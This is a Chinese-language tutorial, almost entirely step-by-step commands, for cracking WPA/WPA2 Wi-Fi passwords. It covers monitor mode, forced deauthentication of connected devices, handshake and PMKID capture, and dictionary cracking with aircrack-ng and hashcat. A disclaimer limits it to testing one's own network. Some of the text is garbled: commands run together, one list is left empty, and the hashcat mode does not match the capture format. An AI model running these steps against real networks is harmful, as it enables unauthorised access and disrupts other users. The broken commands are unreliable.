重要法律提示: 未经许可破解、入侵他人 Wi‑Fi 属于违法行为,会承担民事乃至刑事责任。本教程仅用于学习网络安全知识,仅限测试你自己的 Wi‑Fi。一、环境准备
1. 检查无线网卡是否支持监听模式
iw list
看到 monitor 即支持。
2. 安装必要工具
apt updateapt install -y aircrack-ng hashcat hcxdumptool hcxpcapngtool
二、使用 Aircrack‑ng 破解 WPA/WPA2(经典方法)
1. 停止干扰进程
systemctl stop NetworkManagerairmon-ng check kill
2. 开启网卡监听模式
iw devairmon-ng start wlan0
此时网卡名一般变为 wlan0mon。
3. 扫描附近 Wi‑Fi
airodump-ng wlan0mon
记下:
4. 抓握手包
airodump-ng -c 信道 --bssid 路由器MAC -w 保存文件名 wlan0mon
保持该窗口不关闭。
5. 强制断开设备获取握手(新开终端)
aireplay-ng --deauth 0 -a 路由器MAC wlan0mon
看到上方窗口出现 WPA handshake: 即抓包成功。
6. 字典破解
aircrack-ng -w /usr/share/wordlists/rockyou.txt 保存文件名-01.cap
三、更现代方法:PMKID 直接抓路由哈希(无需踢设备)
1. 抓 PMKID
hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1
按 Ctrl+C 停止。
2. 转换为 hashcat 格式
hcxpcapngtool pmkid.pcapng -o wifi.hash
3. 字典破解
hashcat -m 2500 wifi.hash /usr/share/wordlists/rockyou.txt
四、字典准备
Kali 自带超大字典,先解压:
gunzip /usr/share/wordlists/rockyou.txt.gz
五、成功判断
- Aircrack:显示
KEY FOUND! [ 密码 ]
六、恢复网卡正常模式
airmon-ng stop wlan0monsystemctl restart NetworkManager
七、关键说明
- 只能破解 WPA/WPA2 PSK 个人 Wi‑Fi